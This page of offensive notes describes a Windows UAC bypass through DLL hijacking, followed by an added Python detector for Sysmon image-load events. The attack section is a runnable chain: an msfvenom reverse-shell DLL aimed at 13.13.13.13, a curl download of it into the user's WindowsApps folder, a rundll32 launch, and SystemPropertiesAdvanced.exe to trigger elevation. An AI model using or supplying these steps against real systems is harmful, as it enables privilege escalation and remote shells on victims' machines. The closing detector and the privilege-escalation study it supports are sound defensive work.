UAC Bypass

About

More about the theory behind UAC can be read here [LINK]

This page looks at UAC bypasses. Every account, even an elevated one, has two tokens, a low-privilege one and a high-privilege one, and sometimes after obtaining a high-privilege user we still need to bypass UAC to actually use the high-privilege token. Here I write about the UAC bypass techniques I used during machines or engagements.

The UACME repository is very useful.

This repository is also useful.

UAC Bypass with DLL Hijacking

Review Path Variable

PS C:\> cmd /c echo %PATH%

Generate Malicious DLL

msfvenom -p windows/shell_reverse_tcp LHOST=13.13.13.13 LPORT=1337 -f dll > srrstr.dll

Download DLL

curl http://13.13.13.13:1337/srrstr.dll -o "C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll"

Execute Malicious DLL on Target

rundll32 shell32.dll,Control_RunDLL C:\Users\ven17\AppData\Local\Microsoft\WindowsApps\srrstr.dll

Ensure No Existing rundll32 Instances

tasklist /svc | findstr "rundll32"
taskkill /PID <PID> /F

Execute SystemPropertiesAdvanced.exe for UAC Bypass

C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe

Verify Elevated Privileges

whoami /priv
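As an added defensive example (not code from the original page), a small Python detector run over constructed Sysmon Event ID 7 ImageLoad records. It flags the load pattern this bypass produces: a binary living under C:\Windows loading a DLL from a user-writable profile directory such as the WindowsApps folder, rated higher when the DLL is unsigned and the loader is an auto-elevating binary. The sample lines and the AUTO_ELEVATE list are assumptions made for the example.

```python
import re

# Constructed Sysmon Event ID 7 (ImageLoad) records flattened to key=value text.
# Sample data written for this example, not captured telemetry.
SAMPLE_EVENTS = """\
EventID=7 Image=C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe ImageLoaded=C:\\Users\\ven17\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll Signed=false
EventID=7 Image=C:\\Windows\\SysWOW64\\SystemPropertiesAdvanced.exe ImageLoaded=C:\\Windows\\SysWOW64\\srrstr.dll Signed=true
EventID=7 Image=C:\\Windows\\System32\\notepad.exe ImageLoaded=C:\\Windows\\System32\\kernel32.dll Signed=true
EventID=7 Image=C:\\Users\\ven17\\AppData\\Local\\Temp\\app.exe ImageLoaded=C:\\Users\\ven17\\AppData\\Local\\Temp\\helper.dll Signed=false
EventID=7 Image=C:\\Windows\\System32\\rundll32.exe ImageLoaded=C:\\Users\\ven17\\AppData\\Local\\Microsoft\\WindowsApps\\srrstr.dll Signed=false
"""

# key=value pairs; values may contain spaces, so stop before the next " key=".
KV_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")

# A DLL loaded from a standard-user-writable location by a binary under
# C:\Windows is the search-order hijack signal this page's technique produces.
USER_WRITABLE_PREFIXES = ("c:\\users\\",)
SYSTEM_PREFIX = "c:\\windows\\"
# Auto-elevating binaries (assumed list; the page uses this one). Extend as needed.
AUTO_ELEVATE = {"systempropertiesadvanced.exe"}


def parse_event(line: str) -> dict:
    return {k: v for k, v in KV_RE.findall(line)}


def is_hijack_load(ev: dict) -> bool:
    """Event 7 where a system binary loads a DLL from a user-writable directory."""
    if ev.get("EventID") != "7":
        return False
    image = ev.get("Image", "").lower()
    loaded = ev.get("ImageLoaded", "").lower()
    return image.startswith(SYSTEM_PREFIX) and loaded.startswith(USER_WRITABLE_PREFIXES)


def severity(ev: dict) -> str:
    """Unsigned DLL loaded by an auto-elevating binary is the worst case."""
    loader = ev.get("Image", "").lower().split("\\")[-1]
    if ev.get("Signed", "").lower() == "false" and loader in AUTO_ELEVATE:
        return "high"
    return "medium"


def find_hijack_loads(text: str) -> list:
    """Return (Image, ImageLoaded, severity) for every suspicious load."""
    hits = []
    for line in text.splitlines():
        ev = parse_event(line)
        if is_hijack_load(ev):
            hits.append((ev["Image"], ev["ImageLoaded"], severity(ev)))
    return hits


if __name__ == "__main__":
    for image, loaded, sev in find_hijack_loads(SAMPLE_EVENTS):
        print(f"[{sev}] {image} loaded {loaded}")
```

A Sysmon ImageLoad rule that keys on the same two conditions (loader under C:\Windows, DLL under the user profile) gives the same signal at collection time, before the log reaches a parser.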